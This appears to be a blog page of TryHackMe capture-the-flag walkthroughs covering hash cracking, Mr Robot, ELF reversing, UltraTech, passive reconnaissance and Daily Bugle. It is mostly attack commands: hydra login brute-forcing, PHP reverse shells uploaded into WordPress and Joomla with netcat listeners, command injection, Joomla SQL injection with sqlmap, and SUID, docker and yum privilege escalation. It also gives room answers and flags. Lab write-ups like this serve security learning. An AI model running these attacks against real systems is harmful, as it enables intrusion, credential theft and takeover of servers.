Crack The Hash TryHackMe Write-ups | THM Walkthroughs | LabViet

# tryhackme

TryHackMe Write-ups THM Walkthrough

https://tryhackme.com/room/crackthehash

$2y$12$Dwt1BZj6pcyc3Dy1FWZ5ieeUznr71EeNkJkUlypTsgbX1H68wsRom

Commands:

grep '^....$' /usr/share/wordlists/rockyou.txt > LabViet4.txt

hashcat -a 0 -m 3200 '$2y$12$Dwt1BZj6pcyc3Dy1FWZ5ieeUznr71EeNkJkUlypTsgbX1H68wsRom' LabViet4.txt

$6$aReallyHardSalt$6WKUTqzq.UQQmrm0p/T7MPpMbGNnzXPMAXi4bJMl9be.cfi3/qxIf.hsGpS41BqMhSrHVXgMpdjS6xeKZAs02.

Commands:

grep '^......$' /usr/share/wordlists/rockyou.txt > LabViet6.txt

hashcat -a 0 -m 1800 '$6$aReallyHardSalt$6WKUTqzq.UQQmrm0p/T7MPpMbGNnzXPMAXi4bJMl9be.cfi3/qxIf.hsGpS41BqMhSrHVXgMpdjS6xeKZAs02.' LabViet6.txt

e5d8870e5bdd26602cab8dbe07a942c8669e56d6:tryhackme

hashcat -a 0 -m 160 'e5d8870e5bdd26602cab8dbe07a942c8669e56d6:tryhackme' /usr/share/wordlists/rockyou.txt

-------------

**https://tryhackme.com/room/mrrobot**

**Copyright @ http://bloggeroffer.blogspot.com**

**Task 1**

S1.1

nmap -sC -sV -O [ip-address] -oN basic_scan.nmap

S1.2

nikto -h [ip-address]

or

gobuster dir -u http://[ip-address] -w /usr/share/wordlists/dirb/common.txt -o directories.txt

S1.3

With Firefox, open http://[ip-address]/robots.xml AND http://[ip-address]/key-1-of-3.txt -> Key 1

Or with Linux: curl -s http://[ip-address]/robots.txt AND curl -s http://[ip-address]/key-1-of-3.txt -> Key 1

http://[ip-address]/fsocity.dic -> Guess that's Users & Pws

Task 2

Method 1: 

curl -s http://[ip-address]/license | tr -d "\n" 

then 

echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 -d

or Decode on https://www.base64decode.org/

Method 2

S2.1: List Directories

gobuster dir -u [ip-address] -w /usr/share/dirbuster/directory-list-2.3-medium.txt -e

S2.2: Get File that we guess it's Us, pw

wget http://[ip-address]/fsocity.dic

S2.3: Guess username of Wordpress Login

hydra -L fsocity.dic.uniq -p nopass \

-s 80 1[ip-address] http-post-form -t 30 \

'/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:Invalid username' 

S2.4: Guess password of Wordpress Login

hydra -l Elliot -P fsocity.dic.uniq \

-s 80 [ip-address] http-post-form -t 30 \

'/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:The password you entered for the username'

Both S2.3, S2.4 can do with wpscan:

wpscan -u users.txt -p pw.txt --url http://[ip-address]/wp-admin

S2.5 Upload Revert Shell via 404.php

Download php revert shell: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

Change $ip= in that php file. Note: $ip = IP Address for Reverse Shell, not [ip-address]

S2.6 Use Netcat to open a listener

nc -nlvp 1234

S2.7 Open the reverse shell

http://[ip-address]/404.php

S2.8 Get Root pass

ls -l /home/robot/

cat password.raw-md5

Password is in MD5 hash, we can reverse on this site: https://md5.gromweb.com/?md5=c3fcd3d76192e4007dfb496cca67e13b or https://crackstation.net/

S2.9 Su - robot

Solve: su: must be run from a terminal

python -c 'import pty; pty.spawn("/bin/sh")'

After above command, we can Su - robot then 

Cat key-2-of-3.txt

Task 3

S3.1 Sudo -l

(robot: a->z)

Solve: Sorry, user robot may not run sudo on linux.

First, find all App run Owned by Root:

find / -user root -perm -4000 -print 2>/dev/null

Second, we found nmap can run as Root with this command:

ls -l /usr/local/bin/nmap

Final, nmap interactive:

nmap --interactive

!whoami

!ls /root

!cat /root/key-3-of-3.txt

TryHackMe | Reversing ELF

https://tryhackme.com/room/reverselfiles

Task 1

file crackme1

chmod +x crackme1

./crackme1

Task 2

strings crackme2

./crackme2 super_secret_password

Task 3

strings crackme3

or

r2 -A crackme3

echo HashHere | base64 -d

Task 4

Method 1

r2 -A crackme4 pass

px @ rax

Method 2

strings crackme4

Use radare2

r2 -d ./crackme4 password

aa

afl | grep main

pdf @main

pdf @sym.compare_pwd

db 0x0040006cf

dc

px @ rbp-0x20

Task 5

strings crackme5

Method 1

r2 -A crackme5 

px @ rdx

Method 2

r2 -d ./crackme5 

pdf @main

pdf @sym.compare_pwd

db 0x004000829

db 0x004000834

dc

px @ rbp-0x30

px @ rbp-0x50

./crackme5

OfdlDSA|3tXb32~X3tX@sX`4tXtz

Task 6

chmod +x crackme6

Use Ghidra https://ghidra-sre.org/ as a Decompiler

Go to main function, it call compare_pwd

Looking at compate_pwd, Decompile my_secure_test.

We get 313333375f707764

Visit https://toolbox.googleapps.com/apps/encode_decode/

Then choose Hex Decode

Task 7

Run Ghidra, see main function, local 14 == 0x7a69. Use https://www.convzone.com/hex-to-decimal/ Convert this hex to dec is 31337.

./crackme7 31337

Task 8

Run Ghidra, see main function, iVar2 == -0x35010ff3. Use https://www.convzone.com/hex-to-decimal/ Convert this hex to dec is -889262067.

./crackme7 -889262067

UltraTech

https://tryhackme.com/room/ultratech1

nmap -sC -sV -p- 10.10.64.13

gobuster dir --url http://10.10.64.13 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 32

gobuster dir --url http://10.10.64.13:8081/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 32

gobuster dir --url http://10.10.64.13:31331/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 32

http://10.10.64.13:8081/ping?ip='cat utech.db.sqlite'

--or curl -i 'http://10.10.64.13:8081/ping?ip='cat%20utech.db.sqlite''

crackstation.net f357a0c52799563c7c7b76c1e7543a32

--or

hashcat -a 0 -m 0 f357a0c52799563c7c7b76c1e7543a32 /usr/share/wordlists/rockyou.txt --quiet

ssh r00t@10.10.131.120

id

docker images

docker run -v /:/mnt --rm -it bash chroot /mnt bash

whoami

ls -la /root

TryHackMe | Passive Reconnaissance

https://tryhackme.com/room/passiverecon

Task 2  Passive Versus Active Recon

1.Q

You visit the Facebook page of the target company, hoping to get some of their employee names. What kind of reconnaissance activity is this? (A for active, P for passive)

Ans: P

2.Q

You ping the IP address of the company webserver to check if ICMP traffic is blocked. What kind of reconnaissance activity is this? (A for active, P for passive)

Ans: A

3.Q

You happen to meet the IT administrator of the target company at a party. You try to use social engineering to get more information about their systems and network infrastructure. What kind of reconnaissance activity is this? (A for active, P for passive)

Ans: A

*Task 3  Whois

When was TryHackMe.com registered?

Ans:  20180705

2.Q

What is the registrar of TryHackMe.com?

Ans: namecheap.com

3.Q

Which company is TryHackMe.com using for name servers?

Ans: cloudflare.com

*Task 4  nslookup and dig

1.Q

Check the TXT records of thmlabs.com. What is the flag there

nslookup -type=MX tryhackme.com

Ans: THM{a5b83929888ed36acb0272971e43****}

*Task 5  DNSDumpster

Lookup tryhackme.com on DNSDumpster. What is one interesting subdomain that you would discover in addition to www and blog?

Ans: remote

*Task 6  Shodan.io

1.Q

According to Shodan.io, what is the 2nd country in the world in terms of the number of publicly accessible Apache servers?

Search query: Apache

Ans: Germany

2.Q

Based on Shodan.io, what is the 3rd most common port used for Apache?

Search query: Apache

Ans:  8080

3.Q

Based on Shodan.io, what is the 3rd most common port used for nginx?

Search query: nginx

Ans: 5051

TryHackMe | Daily Bugle

https://tryhackme.com/room/dailybugle

nmap -sV -sc IP-address

Detect Joomla version:

http://IP-address/administrator/manifests/files/joomla.xml

searchsploit joomla 3.7.0

searchsploit -m php/webapps/42033.txt

http://IP-address/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)

sqlmap -u "http://IP-address/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

Us, pw:

sqlmap -u "http://IP-address/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla -T "#__users" -C username,password -p list[fullordering] --dump

--Save hash

sudo nano VietKim.txt

Decode hash

john --wordlist=/usr/share/wordlists/rockyou.txt VietKim.txt

Login http://IP-address/administrator/index.php with above username, password

Click to Extensions–>Templates–>Templates

Select Protostar theme (in use)

index.php

Download Reverse Shell

https://raw.githubusercontent.com/jbarcia/Web-Shells/master/laudanum/php/php-reverse-shell.php

Paste content of the PHP reverse shell to the beginning of the index.php (Note to Change Revers IP, Port -> 443)

sudo nc -lvnp 443

python -c 'import pty; pty.spawn("/bin/sh")'

stty raw -echo

sudo nc -lvnp 443

cd /var/www/html

cat configuration.php

su jjameson

whoami

sudo -l

TF=$(mktemp -d)

echo 'id' > $TF/x.sh

fpm -n x -s dir -t rpm -a all -before-install $TF/x.sh $TF

ls -la x-1.0-1.noarch.rpm

wget http://IP-Reverse/x-1.0-1.noarch.rpm

sudo python -m http.server 80

sudo yum localinstall -y x-1.0-1.noarch.rpm

TF=$(mktemp -d)

echo 'cp /bin/bash /tmp/stef && chmod +s /tmp/stef' > $TF/x.sh

fpm -n a -s dir -t rpm -a all -before-install $TF/x.sh $TF

ls -la a-1.0-1.noarch.rpm

wget http://IP-Reverse/x-1.0-1.noarch.rpm

sudo python -m http.server 80

sudo yum localinstall -y a-1.0-1.noarch.rpm

ls -la /tmp/stef

/tmp/stef -p

whoami

👇For any Query message me on Facebook👇

Facebook Link :- https://FB.COM/K3Lvinmitnick

-----------------

Disclaimer: The content in this video is strictly for Education purposes only. Copyright Disclaimer Under Section 107 of the Copyright Act 1976, allowance is made for "fair use" for purposes such as criticism, comment, news reporting, teaching, scholarship, and research. This video is not forcing anything on you.

-----------------

🔔📢 Subscribe for more TIPs from VietKim → https://bit.ly/VietTube

🌐 Follow VietKim on https://FB.COM/K3Lvinmitnick

🌐 Visit https://bloggeroffer.blogspot.com/ to learn more ...